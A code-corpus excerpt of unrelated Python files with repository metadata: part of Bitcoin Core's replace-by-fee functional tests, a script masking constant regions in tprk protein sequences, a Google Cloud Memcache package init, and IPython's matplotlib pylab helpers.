            tx.rehash()
            assert tx.hash not in mempool
        # Try again, but with more total transactions than the "max txs
        # double-spent at once" anti-DoS limit.
        for n in (MAX_REPLACEMENT_LIMIT + 1, MAX_REPLACEMENT_LIMIT * 2):
            fee = int(0.00001 * COIN)
            tx0_outpoint = self.make_utxo(self.nodes[0], initial_nValue)
            tree_txs = list(branch(tx0_outpoint, initial_nValue, n, fee=fee))
            assert_equal(len(tree_txs), n)
            dbl_tx = CTransaction()
            dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
            dbl_tx.vout = [CTxOut(initial_nValue - 2 * fee * n, DUMMY_P2WPKH_SCRIPT)]
            dbl_tx_hex = dbl_tx.serialize().hex()
            # This will raise an exception
            assert_raises_rpc_error(-26, "too many potential replacements", self.nodes[0].sendrawtransaction, dbl_tx_hex, 0)
            # All original transactions must still be in the mempool.
            for tx in tree_txs:
                tx.rehash()
                self.nodes[0].getrawtransaction(tx.hash)

    def test_replacement_feeperkb(self):
        """Replacement requires fee-per-KB to be higher"""
        tx0_outpoint = self.make_utxo(self.nodes[0], int(1.1 * COIN))
        tx1a = CTransaction()
        tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
        tx1a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
        tx1a_hex = tx1a.serialize().hex()
        self.nodes[0].sendrawtransaction(tx1a_hex, 0)
        # Higher fee, but the fee per KB is much lower, so the replacement is
        # rejected.
        tx1b = CTransaction()
        tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
        tx1b.vout = [CTxOut(int(0.001 * COIN), CScript([b'a' * 999000]))]
        tx1b_hex = tx1b.serialize().hex()
        # This will raise an exception due to insufficient fee
        assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, tx1b_hex, 0)

    def test_spends_of_conflicting_outputs(self):
        """Replacements that spend conflicting tx outputs are rejected"""
        utxo1 = self.make_utxo(self.nodes[0], int(1.2 * COIN))
        utxo2 = self.make_utxo(self.nodes[0], 3 * COIN)
        tx1a = CTransaction()
        tx1a.vin = [CTxIn(utxo1, nSequence=0)]
        tx1a.vout = [CTxOut(int(1.1 * COIN), DUMMY_P2WPKH_SCRIPT)]
        tx1a_hex = tx1a.serialize().hex()
        tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, 0)
        tx1a_txid = int(tx1a_txid, 16)
        # Direct spend an output of the transaction we're replacing.
        tx2 = CTransaction()
        tx2.vin = [CTxIn(utxo1, nSequence=0), CTxIn(utxo2, nSequence=0)]
        tx2.vin.append(CTxIn(COutPoint(tx1a_txid, 0), nSequence=0))
        tx2.vout = tx1a.vout
        tx2_hex = tx2.serialize().hex()
        # This will raise an exception
        assert_raises_rpc_error(-26, "bad-txns-spends-conflicting-tx", self.nodes[0].sendrawtransaction, tx2_hex, 0)
        # Spend tx1a's output to test the indirect case.
        tx1b = CTransaction()
        tx1b.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0)]
        tx1b.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
        tx1b_hex = tx1b.serialize().hex()
        tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, 0)
        tx1b_txid = int(tx1b_txid, 16)
        tx2 = CTransaction()
        tx2.vin = [CTxIn(utxo1, nSequence=0), CTxIn(utxo2, nSequence=0),
                   CTxIn(COutPoint(tx1b_txid, 0))]
        tx2.vout = tx1a.vout
        tx2_hex = tx2.serialize().hex()
        # This will raise an exception
        assert_raises_rpc_error(-26, "bad-txns-spends-conflicting-tx", self.nodes[0].sendrawtransaction, tx2_hex, 0)

    def test_new_unconfirmed_inputs(self):
        """Replacements that add new unconfirmed inputs are rejected"""
        confirmed_utxo = self.make_utxo(self.nodes[0], int(1.1 * COIN))
        unconfirmed_utxo = self.make_utxo(self.nodes[0], int(0.1 * COIN), False)
        tx1 = CTransaction()
        tx1.vin = [CTxIn(confirmed_utxo)]
        tx1.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
        tx1_hex = tx1.serialize().hex()
        self.nodes[0].sendrawtransaction(tx1_hex, 0)
        tx2 = CTransaction()
        tx2.vin = [CTxIn(confirmed_utxo), CTxIn(unconfirmed_utxo)]
        tx2.vout = tx1.vout
        tx2_hex = tx2.serialize().hex()
        # This will raise an exception
        assert_raises_rpc_error(-26, "replacement-adds-unconfirmed", self.nodes[0].sendrawtransaction, tx2_hex, 0)

    def test_too_many_replacements(self):
        """Replacements that evict too many transactions are rejected"""
        # Try directly replacing more than MAX_REPLACEMENT_LIMIT
        # transactions
        # Start by creating a single transaction with many outputs
        initial_nValue = 10 * COIN
        utxo = self.make_utxo(self.nodes[0], initial_nValue)
        fee = int(0.0001 * COIN)
        split_value = int((initial_nValue - fee) / (MAX_REPLACEMENT_LIMIT + 1))
        outputs = []
        for _ in range(MAX_REPLACEMENT_LIMIT + 1):
            outputs.append(CTxOut(split_value, CScript([1])))
        splitting_tx = CTransaction()
        splitting_tx.vin = [CTxIn(utxo, nSequence=0)]
        splitting_tx.vout = outputs
        splitting_tx_hex = splitting_tx.serialize().hex()
        txid = self.nodes[0].sendrawtransaction(splitting_tx_hex, 0)
        txid = int(txid, 16)
        # Now spend each of those outputs individually
        for i in range(MAX_REPLACEMENT_LIMIT + 1):
            tx_i = CTransaction()
            tx_i.vin = [CTxIn(COutPoint(txid, i), nSequence=0)]
            tx_i.vout = [CTxOut(split_value - fee, DUMMY_P2WPKH_SCRIPT)]
            tx_i_hex = tx_i.serialize().hex()
            self.nodes[0].sendrawtransaction(tx_i_hex, 0)
        # Now create doublespend of the whole lot; should fail.
        # Need a big enough fee to cover all spending transactions and have
        # a higher fee rate
        double_spend_value = (split_value - 100 * fee) * (MAX_REPLACEMENT_LIMIT + 1)
        inputs = []
        for i in range(MAX_REPLACEMENT_LIMIT + 1):
            inputs.append(CTxIn(COutPoint(txid, i), nSequence=0))
        double_tx = CTransaction()
        double_tx.vin = inputs
        double_tx.vout = [CTxOut(double_spend_value, CScript([b'a']))]
        double_tx_hex = double_tx.serialize().hex()
        # This will raise an exception
        assert_raises_rpc_error(-26, "too many potential replacements", self.nodes[0].sendrawtransaction, double_tx_hex, 0)
        # If we remove an input, it should pass
        double_tx = CTransaction()
        double_tx.vin = inputs[0:-1]
        double_tx.vout = [CTxOut(double_spend_value, CScript([b'a']))]
        double_tx_hex = double_tx.serialize().hex()
        self.nodes[0].sendrawtransaction(double_tx_hex, 0)

    def test_opt_in(self):
        """Replacing should only work if orig tx opted in"""
        tx0_outpoint = self.make_utxo(self.nodes[0], int(1.1 * COIN))
        # Create a non-opting in transaction
        tx1a = CTransaction()
        tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0xffffffff)]
        tx1a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
        tx1a_hex = tx1a.serialize().hex()
        tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, 0)
        # This transaction isn't shown as replaceable
        assert_equal(self.nodes[0].getmempoolentry(tx1a_txid)['bip125-replaceable'], False)
        # Shouldn't be able to double-spend
        tx1b = CTransaction()
        tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
        tx1b.vout = [CTxOut(int(0.9 * COIN), DUMMY_P2WPKH_SCRIPT)]
        tx1b_hex = tx1b.serialize().hex()
        # This will raise an exception
        assert_raises_rpc_error(-26, "txn-mempool-conflict", self.nodes[0].sendrawtransaction, tx1b_hex, 0)
        tx1_outpoint = self.make_utxo(self.nodes[0], int(1.1 * COIN))
        # Create a different non-opting in transaction
        tx2a = CTransaction()
        tx2a.vin = [CTxIn(tx1_outpoint, nSequence=0xfffffffe)]
        tx2a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
        tx2a_hex = tx2a.serialize().hex()
        tx2a_txid = self.nodes[0].sendrawtransaction(tx2a_hex, 0)
        # Still shouldn't be able to double-spend
        tx2b = CTransaction()
        tx2b.vin = [CTxIn(tx1_outpoint, nSequence=0)]
        tx2b.vout = [CTxOut(int(0.9 * COIN), DUMMY_P2WPKH_SCRIPT)]
        tx2b_hex = tx2b.serialize().hex()
        # This will raise an exception
        assert_raises_rpc_error(-26, "txn-mempool-conflict", self.nodes[0].sendrawtransaction, tx2b_hex, 0)
        # Now create a new transaction that spends from tx1a and tx2a
        # opt-in on one of the inputs
        # Transaction should be replaceable on either input
        tx1a_txid = int(tx1a_txid, 16)
        tx2a_txid = int(tx2a_txid, 16)
        tx3a = CTransaction()
        tx3a.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0xffffffff),
                    CTxIn(COutPoint(tx2a_txid, 0), nSequence=0xfffffffd)]
        tx3a.vout = [CTxOut(int(0.9 * COIN), CScript([b'c'])), CTxOut(int(0.9 * COIN), CScript([b'd']))]
        tx3a_hex = tx3a.serialize().hex()
        tx3a_txid = self.nodes[0].sendrawtransaction(tx3a_hex, 0)
        # This transaction is shown as replaceable
        assert_equal(self.nodes[0].getmempoolentry(tx3a_txid)['bip125-replaceable'], True)
        tx3b = CTransaction()
        tx3b.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0)]
        tx3b.vout = [CTxOut(int(0.5 * COIN), DUMMY_P2WPKH_SCRIPT)]
        tx3b_hex = tx3b.serialize().hex()
        tx3c = CTransaction()
        tx3c.vin = [CTxIn(COutPoint(tx2a_txid, 0), nSequence=0)]
        tx3c.vout = [CTxOut(int(0.5 * COIN), DUMMY_P2WPKH_SCRIPT)]
        tx3c_hex = tx3c.serialize().hex()
        self.nodes[0].sendrawtransaction(tx3b_hex, 0)
        # If tx3b was accepted, tx3c won't look like a replacement,
        # but make sure it is accepted anyway
        self.nodes[0].sendrawtransaction(tx3c_hex, 0)

    def test_prioritised_transactions(self):
        """Fee deltas set via prioritisetransaction are used by RBF checks."""
        # Ensure that fee deltas used via prioritisetransaction are
        # correctly used by replacement logic
        # 1. Check that feeperkb uses modified fees
        tx0_outpoint = self.make_utxo(self.nodes[0], int(1.1 * COIN))
        tx1a = CTransaction()
        tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
        tx1a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
        tx1a_hex = tx1a.serialize().hex()
        tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, 0)
        # Higher fee, but the actual fee per KB is much lower.
        tx1b = CTransaction()
        tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
        tx1b.vout = [CTxOut(int(0.001 * COIN), CScript([b'a' * 740000]))]
        tx1b_hex = tx1b.serialize().hex()
        # Verify tx1b cannot replace tx1a.
        assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, tx1b_hex, 0)
        # Use prioritisetransaction to set tx1a's fee to 0.
        self.nodes[0].prioritisetransaction(txid=tx1a_txid, fee_delta=int(-0.1 * COIN))
        # Now tx1b should be able to replace tx1a
        tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, 0)
        assert tx1b_txid in self.nodes[0].getrawmempool()
        # 2. Check that absolute fee checks use modified fee.
        tx1_outpoint = self.make_utxo(self.nodes[0], int(1.1 * COIN))
        tx2a = CTransaction()
        tx2a.vin = [CTxIn(tx1_outpoint, nSequence=0)]
        tx2a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
        tx2a_hex = tx2a.serialize().hex()
        self.nodes[0].sendrawtransaction(tx2a_hex, 0)
        # Lower fee, but we'll prioritise it
        tx2b = CTransaction()
        tx2b.vin = [CTxIn(tx1_outpoint, nSequence=0)]
        tx2b.vout = [CTxOut(int(1.01 * COIN), DUMMY_P2WPKH_SCRIPT)]
        tx2b.rehash()
        tx2b_hex = tx2b.serialize().hex()
        # Verify tx2b cannot replace tx2a.
        assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, tx2b_hex, 0)
        # Now prioritise tx2b to have a higher modified fee
        self.nodes[0].prioritisetransaction(txid=tx2b.hash, fee_delta=int(0.1 * COIN))
        # tx2b should now be accepted
        tx2b_txid = self.nodes[0].sendrawtransaction(tx2b_hex, 0)
        assert tx2b_txid in self.nodes[0].getrawmempool()

    def test_rpc(self):
        """RPCs expose the replaceable flag through the input nSequence."""
        us0 = self.nodes[0].listunspent()[0]
        ins = [us0]
        outs = {self.nodes[0].getnewaddress(): Decimal(1.0000000)}
        rawtx0 = self.nodes[0].createrawtransaction(ins, outs, 0, True)
        rawtx1 = self.nodes[0].createrawtransaction(ins, outs, 0, False)
        json0 = self.nodes[0].decoderawtransaction(rawtx0)
        json1 = self.nodes[0].decoderawtransaction(rawtx1)
        assert_equal(json0["vin"][0]["sequence"], 4294967293)
        assert_equal(json1["vin"][0]["sequence"], 4294967295)
        rawtx2 = self.nodes[0].createrawtransaction([], outs)
        frawtx2a = self.nodes[0].fundrawtransaction(rawtx2, {"replaceable": True})
        frawtx2b = self.nodes[0].fundrawtransaction(rawtx2, {"replaceable": False})
        json0 = self.nodes[0].decoderawtransaction(frawtx2a['hex'])
        json1 = self.nodes[0].decoderawtransaction(frawtx2b['hex'])
        assert_equal(json0["vin"][0]["sequence"], 4294967293)
        assert_equal(json1["vin"][0]["sequence"], 4294967294)

    def test_no_inherited_signaling(self):
        """Check replacement of a non-signaling child of a signaling parent
        (see CVE-2021-31876)."""
        confirmed_utxo = self.wallet.get_utxo()
        # Create an explicitly opt-in parent transaction
        optin_parent_tx = self.wallet.send_self_transfer(
            from_node=self.nodes[0],
            utxo_to_spend=confirmed_utxo,
            sequence=BIP125_SEQUENCE_NUMBER,
            fee_rate=Decimal('0.01'),
        )
        assert_equal(True, self.nodes[0].getmempoolentry(optin_parent_tx['txid'])['bip125-replaceable'])
        replacement_parent_tx = self.wallet.create_self_transfer(
            from_node=self.nodes[0],
            utxo_to_spend=confirmed_utxo,
            sequence=BIP125_SEQUENCE_NUMBER,
            fee_rate=Decimal('0.02'),
        )
        # Test if parent tx can be replaced.
        res = self.nodes[0].testmempoolaccept(rawtxs=[replacement_parent_tx['hex']])[0]
        # Parent can be replaced.
        assert_equal(res['allowed'], True)
        # Create an opt-out child tx spending the opt-in parent
        parent_utxo = self.wallet.get_utxo(txid=optin_parent_tx['txid'])
        optout_child_tx = self.wallet.send_self_transfer(
            from_node=self.nodes[0],
            utxo_to_spend=parent_utxo,
            sequence=0xffffffff,
            fee_rate=Decimal('0.01'),
        )
        # Reports true due to inheritance
        assert_equal(True, self.nodes[0].getmempoolentry(optout_child_tx['txid'])['bip125-replaceable'])
        replacement_child_tx = self.wallet.create_self_transfer(
            from_node=self.nodes[0],
            utxo_to_spend=parent_utxo,
            sequence=0xffffffff,
            fee_rate=Decimal('0.02'),
            mempool_valid=False,
        )
        # Broadcast replacement child tx
        # BIP 125 :
        # 1. The original transactions signal replaceability explicitly or through inheritance as described in the above
        # Summary section.
        # The original transaction (`optout_child_tx`) doesn't signal RBF but its parent (`optin_parent_tx`) does.
        # The replacement transaction (`replacement_child_tx`) should be able to replace the original transaction.
        # See CVE-2021-31876 for further explanations.
        assert_equal(True, self.nodes[0].getmempoolentry(optin_parent_tx['txid'])['bip125-replaceable'])
        assert_raises_rpc_error(-26, 'txn-mempool-conflict', self.nodes[0].sendrawtransaction, replacement_child_tx["hex"], 0)
        self.log.info('Check that the child tx can still be replaced (via a tx that also replaces the parent)')
        replacement_parent_tx = self.wallet.send_self_transfer(
            from_node=self.nodes[0],
            utxo_to_spend=confirmed_utxo,
            sequence=0xffffffff,
            fee_rate=Decimal('0.03'),
        )
        # Check that child is removed and update wallet utxo state
        assert_raises_rpc_error(-5, 'Transaction not in mempool', self.nodes[0].getmempoolentry, optout_child_tx['txid'])
        self.wallet.get_utxo(txid=optout_child_tx['txid'])

    def test_replacement_relay_fee(self):
        """A replacement must pay at least the incremental relay fee on top."""
        tx = self.wallet.send_self_transfer(from_node=self.nodes[0])['tx']
        # Higher fee, higher feerate, different txid, but the replacement does not provide a relay
        # fee conforming to node's `incrementalrelayfee` policy of 1000 sat per KB.
        tx.vout[0].nValue -= 1
        assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, tx.serialize().hex())
# Standard functional-test entry point.
if __name__ == '__main__':
    ReplaceByFeeTest().main()
| 41.376789 | 126 | 0.637132 |
81546c8d57f79b489b68e06db43e8c91d7ca9ce7 | 3,449 | py | Python | pipeline/mask_constant_regions.py | greninger-lab/tprk_diversity2 | c7fba6a42ae1476f6dce923184d0c0c0b7eed846 | [
"MIT"
] | null | null | null | pipeline/mask_constant_regions.py | greninger-lab/tprk_diversity2 | c7fba6a42ae1476f6dce923184d0c0c0b7eed846 | [
"MIT"
] | null | null | null | pipeline/mask_constant_regions.py | greninger-lab/tprk_diversity2 | c7fba6a42ae1476f6dce923184d0c0c0b7eed846 | [
"MIT"
] | null | null | null | # Masks constant regions in full length sequences from unwrap.fasta, which can be generated from the following command:
# awk 'BEGIN {RS=">";FS="\n";OFS=""} NR>1 {print ">"$1; $1=""; print}' Isolates_aa_filt_fullORFs.aln.fasta > unwrap.fasta
# Constant regions are found with fuzzy match based on length, and replaced with X's.
import subprocess
import argparse
import sys
import os
import regex
from itertools import chain
import numpy as np
from Bio.Seq import Seq
from Bio.Alphabet import generic_dna
import pandas as pd

# Constant (non-variable) amino-acid regions to be masked out of each read.
constant_regions = [
    "MIDPSATSRYGSPRLVSNGFRHRRKVVYQRVGHRRFSLIFFFVVVLGRSPRLWAQVSFTPDIEGYAELAW",
    "GFKTTTDFKIVFPIVAKKDFKYRGEGNVYAEINVKALKLSLESNGGAKFDTKGSAKTIEATLHCYGAYLTIGKNPDFKSTFAVLWEPWTANGDYKSKGDKPVYEPGFEGAGGKLGYKQTDIAGTGLTFDIAFKFASNTD",
    "GDILFGWERTREDGVQEYIKVELTGNS",
    "KLWGLCALAA",
    "GADALLTSGYRWFSAGGYFAS",
    "KLETKGSDPDTSFLEGLDLGVDVRTYM",
    "YFPVYGKVWGSYRHDMGEYGWVKVYANL",
    "ECGVVVSPLEKVEIRLSWEQGKLQENSNVVIEKNVTERWQFVGACRLIW",
]

fasta_file = "unwrap.fasta"


def _mask_constant_regions(read_seq):
    """Return read_seq with every constant region replaced by 'X' characters.

    Each region is first searched for exactly; if no exact hit exists, a
    fuzzy match is attempted (up to 3 substitutions for regions shorter than
    48 residues, up to 5 otherwise). Matches are located against the original
    sequence but replaced in the accumulating masked copy.
    """
    masked = read_seq
    for constant_seq in constant_regions:
        exact_match = regex.search(constant_seq, read_seq)
        if exact_match:
            masked = masked.replace(exact_match[0], 'X' * len(exact_match[0]))
            continue
        # Fuzzy matching: allow more substitutions for longer regions.
        max_subs = 3 if len(constant_seq) < 48 else 5
        fuzzy_match = regex.search(r"(?b)(" + constant_seq + "){s<=" + str(max_subs) + "}", read_seq)
        if fuzzy_match:
            masked = masked.replace(fuzzy_match[0], 'X' * len(fuzzy_match[0]))
    return masked


def _merge_read(read_name, read_count, masked_seq, names, seqs):
    """Fold a masked read into (names, seqs) in place.

    Identical sequences from the same sample are collapsed by summing their
    counts into the existing entry's name (format: sample_id_count).
    Identical sequences from *different* samples are kept separate.
    """
    collapsed = False
    for index_num, existing_seq in enumerate(seqs):
        if masked_seq != existing_seq:
            continue
        prev_name = names[index_num]
        prev_count = int(prev_name.split("_")[2])
        sample_name = read_name.split("_")[0]
        prev_sample_name = prev_name.split("_")[0]
        # only collapse if they are within the same sample
        if sample_name == prev_sample_name:
            new_count = prev_count + read_count
            new_name = prev_name.split("_")[0] + "_" + prev_name.split("_")[1] + "_" + str(new_count)
            names[index_num] = new_name
            print(names[index_num])
            print("collapsing ", prev_name, " and ", read_name, " into ", new_name)
            collapsed = True
        else:
            print("Identical matches between different samples found. Not collapsing.")
    if not collapsed:
        names.append(read_name)
        seqs.append(masked_seq)


output_names = []
output_read_seqs = []
# FASTA is assumed unwrapped: name line followed by a single sequence line.
# Use a context manager so the input handle is closed deterministically.
with open(fasta_file) as fasta_handle:
    for line_num, line in enumerate(fasta_handle):
        if line_num % 2 == 0:
            # Read name, e.g. ">Sample_aaX_count" — count is the third field.
            read_name = line.rstrip()
            read_count = int(read_name.split("_")[2])
        else:
            masked_read_seq = _mask_constant_regions(line.rstrip())
            _merge_read(read_name, read_count, masked_read_seq, output_names, output_read_seqs)

# Write results last and close the file explicitly (the original left the
# handle open, relying on interpreter shutdown to flush the output).
with open("masked_constant_regions.fasta", "w+") as output_file:
    for index, name in enumerate(output_names):
        output_file.write(name + "\n")
        output_file.write(output_read_seqs[index] + "\n")
0cc5e89622e5abf0cfd01ce1a97aad5032d83ba8 | 678 | py | Python | google/cloud/memcache_v1beta2/services/cloud_memcache/__init__.py | vam-google/python-memcache | 247ad6661e64d32fc4ba83b65b8f1562748dabe0 | [
"Apache-2.0"
] | null | null | null | google/cloud/memcache_v1beta2/services/cloud_memcache/__init__.py | vam-google/python-memcache | 247ad6661e64d32fc4ba83b65b8f1562748dabe0 | [
"Apache-2.0"
] | null | null | null | google/cloud/memcache_v1beta2/services/cloud_memcache/__init__.py | vam-google/python-memcache | 247ad6661e64d32fc4ba83b65b8f1562748dabe0 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .client import CloudMemcacheClient

# Public API of this subpackage: re-export only the service client.
__all__ = ("CloudMemcacheClient",)
| 32.285714 | 74 | 0.750737 |
b6d9bf785b5406fe0d86ca83d6b96535ff39dd37 | 11,701 | py | Python | pkgs/ipython-1.2.1-py27_0/lib/python2.7/site-packages/IPython/core/pylabtools.py | wangyum/anaconda | 6e5a0dbead3327661d73a61e85414cf92aa52be6 | [
"Apache-2.0",
"BSD-3-Clause"
] | 26 | 2018-02-14T23:52:58.000Z | 2021-08-16T13:50:03.000Z | pkgs/ipython-1.2.1-py27_0/lib/python2.7/site-packages/IPython/core/pylabtools.py | wangyum/anaconda | 6e5a0dbead3327661d73a61e85414cf92aa52be6 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | pkgs/ipython-1.2.1-py27_0/lib/python2.7/site-packages/IPython/core/pylabtools.py | wangyum/anaconda | 6e5a0dbead3327661d73a61e85414cf92aa52be6 | [
"Apache-2.0",
"BSD-3-Clause"
] | 10 | 2018-08-13T19:38:39.000Z | 2020-04-19T03:02:00.000Z | # -*- coding: utf-8 -*-
"""Pylab (matplotlib) support utilities.
Authors
-------
* Fernando Perez.
* Brian Granger
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2009 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import sys
from io import BytesIO
from IPython.core.display import _pngxy
from IPython.utils.decorators import flag_calls
# If user specifies a GUI, that dictates the backend, otherwise we read the
# user's mpl default from the mpl rc structure.
# Maps IPython GUI event-loop names to matplotlib backend names.
backends = {'tk': 'TkAgg',
            'gtk': 'GTKAgg',
            'wx': 'WXAgg',
            'qt': 'Qt4Agg', # qt3 not supported
            'qt4': 'Qt4Agg',
            'osx': 'MacOSX',
            'inline' : 'module://IPython.kernel.zmq.pylab.backend_inline'}

# We also need a reverse backends2guis mapping that will properly choose which
# GUI support to activate based on the desired matplotlib backend. For the
# most part it's just a reverse of the above dict, but we also need to add a
# few others that map to the same GUI manually:
backend2gui = dict(zip(backends.values(), backends.keys()))
# Our tests expect backend2gui to just return 'qt'
backend2gui['Qt4Agg'] = 'qt'
# In the reverse mapping, there are a few extra valid matplotlib backends that
# map to the same GUI support
backend2gui['GTK'] = backend2gui['GTKCairo'] = 'gtk'
backend2gui['WX'] = 'wx'
backend2gui['CocoaAgg'] = 'osx'
#-----------------------------------------------------------------------------
# Matplotlib utilities
#-----------------------------------------------------------------------------
def getfigs(*fig_nums):
    """Return a list of matplotlib figures selected by figure number.

    When called with no arguments, every available figure is returned.
    Numbers that do not correspond to an existing figure produce a warning,
    but the remaining valid figures are still collected.

    Parameters
    ----------
    fig_nums : tuple
        Figure numbers of the figures to return.
    """
    from matplotlib._pylab_helpers import Gcf
    if not fig_nums:
        # No explicit selection: hand back every managed figure.
        return [manager.canvas.figure for manager in Gcf.get_all_fig_managers()]
    selected = []
    for number in fig_nums:
        manager = Gcf.figs.get(number)
        if manager is None:
            print('Warning: figure %s not available.' % number)
            continue
        selected.append(manager.canvas.figure)
    return selected
def figsize(sizex, sizey):
    """Set the default figure size to be [sizex, sizey].

    Easy-to-remember convenience wrapper around assigning to
    ``matplotlib.rcParams['figure.figsize']``.
    """
    from matplotlib import rcParams
    rcParams['figure.figsize'] = [sizex, sizey]
def print_figure(fig, fmt='png'):
    """Convert a figure to svg or png for inline display."""
    from matplotlib import rcParams
    # An empty figure would render as a big blank area (e.g. in the qt
    # console), so return nothing in that case.
    if not (fig.axes or fig.lines):
        return
    dpi = rcParams['savefig.dpi']
    if fmt == 'retina':
        # 'retina' means a pixel-doubled PNG.
        fmt = 'png'
        dpi = dpi * 2
    buffer = BytesIO()
    fig.canvas.print_figure(buffer, format=fmt, bbox_inches='tight',
                            facecolor=fig.get_facecolor(),
                            edgecolor=fig.get_edgecolor(), dpi=dpi)
    return buffer.getvalue()
def retina_figure(fig):
    """Format a figure as a pixel-doubled (retina) PNG.

    Returns ``(pngdata, metadata)`` where metadata reports half the pixel
    dimensions so frontends display the image at 2x density.
    """
    pngdata = print_figure(fig, fmt='retina')
    width, height = _pngxy(pngdata)
    return pngdata, dict(width=width // 2, height=height // 2)
# We need a little factory function here to create the closure where
# safe_execfile can live.
def mpl_runner(safe_execfile):
    """Factory to return a matplotlib-enabled runner for %run.

    Parameters
    ----------
    safe_execfile : function
        This must be a function with the same interface as the
        :meth:`safe_execfile` method of IPython.

    Returns
    -------
    A function suitable for use as the ``runner`` argument of the %run magic
    function.
    """
    def mpl_execfile(fname,*where,**kw):
        """matplotlib-aware wrapper around safe_execfile.

        Its interface is identical to that of the :func:`execfile` builtin.

        This is ultimately a call to execfile(), but wrapped in safeties to
        properly handle interactive rendering."""
        import matplotlib
        import matplotlib.pylab as pylab
        # Turn off rendering until end of script so intermediate draw
        # calls don't flash partially-built figures.
        is_interactive = matplotlib.rcParams['interactive']
        matplotlib.interactive(False)
        safe_execfile(fname,*where,**kw)
        # NOTE(review): interactivity is not restored if safe_execfile
        # raises — confirm that is intentional.
        matplotlib.interactive(is_interactive)
        # make rendering call now, if the user tried to do it while
        # rendering was disabled
        if pylab.draw_if_interactive.called:
            pylab.draw()
            pylab.draw_if_interactive.called = False
    return mpl_execfile
def select_figure_format(shell, fmt):
    """Select the inline-backend figure format: 'png', 'retina', or 'svg'.

    Using this method ensures only one figure format is active at a time.
    """
    from matplotlib.figure import Figure
    from IPython.kernel.zmq.pylab import backend_inline

    formatters = shell.display_formatter.formatters
    svg_formatter = formatters['image/svg+xml']
    png_formatter = formatters['image/png']

    # For each choice, unregister the competing printer and register the
    # requested one, so only a single mimetype is produced per figure.
    if fmt == 'svg':
        png_formatter.type_printers.pop(Figure, None)
        svg_formatter.for_type(Figure, lambda fig: print_figure(fig, 'svg'))
    elif fmt == 'png':
        svg_formatter.type_printers.pop(Figure, None)
        png_formatter.for_type(Figure, lambda fig: print_figure(fig, 'png'))
    elif fmt in ('png2x', 'retina'):
        svg_formatter.type_printers.pop(Figure, None)
        png_formatter.for_type(Figure, retina_figure)
    else:
        raise ValueError("supported formats are: 'png', 'retina', 'svg', not %r" % fmt)

    # set the format to be used in the backend()
    backend_inline._figure_format = fmt
#-----------------------------------------------------------------------------
# Code for initializing matplotlib and importing pylab
#-----------------------------------------------------------------------------
def find_gui_and_backend(gui=None, gui_select=None):
    """Given a gui string return the gui and matplotlib backend.

    Parameters
    ----------
    gui : str
        Can be one of ('tk','gtk','wx','qt','qt4','inline'), or None/'auto'
        to detect from matplotlib's configuration.
    gui_select : str
        Can be one of ('tk','gtk','wx','qt','qt4','inline').
        This is any gui already selected by the shell.

    Returns
    -------
    A tuple of (gui, backend) where backend is one of ('TkAgg','GTKAgg',
    'WXAgg','Qt4Agg','module://IPython.kernel.zmq.pylab.backend_inline').
    """
    import matplotlib

    if not gui or gui == 'auto':
        # We need to read the backend from the original data structure,
        # *not* from mpl.rcParams, since a prior invocation of %matplotlib
        # may have overwritten that.
        # WARNING: this assumes matplotlib 1.1 or newer!!
        backend = matplotlib.rcParamsOrig['backend']
        # Find the gui selection IPython must make so it can activate the
        # matching inputhook.
        gui = backend2gui.get(backend, None)
        # If we have already had a gui active, only it and inline are the
        # ones allowed.
        if gui_select and gui != gui_select:
            gui = gui_select
            backend = backends[gui]
    else:
        # Explicit request: select backend based on requested gui.
        backend = backends[gui]
    return gui, backend
def activate_matplotlib(backend):
    """Activate the given backend and set interactive to True.

    Parameters
    ----------
    backend : str
        A matplotlib backend name (e.g. 'TkAgg') or a backend module path
        such as the inline backend's 'module://...' string.
    """
    import matplotlib
    matplotlib.interactive(True)

    # Matplotlib had a bug where even switch_backend could not force
    # the rcParam to update. This needs to be set *before* the module
    # magic of switch_backend().
    matplotlib.rcParams['backend'] = backend

    import matplotlib.pyplot
    matplotlib.pyplot.switch_backend(backend)

    # This must be imported last in the matplotlib series, after
    # backend/interactivity choices have been made
    import matplotlib.pylab as pylab

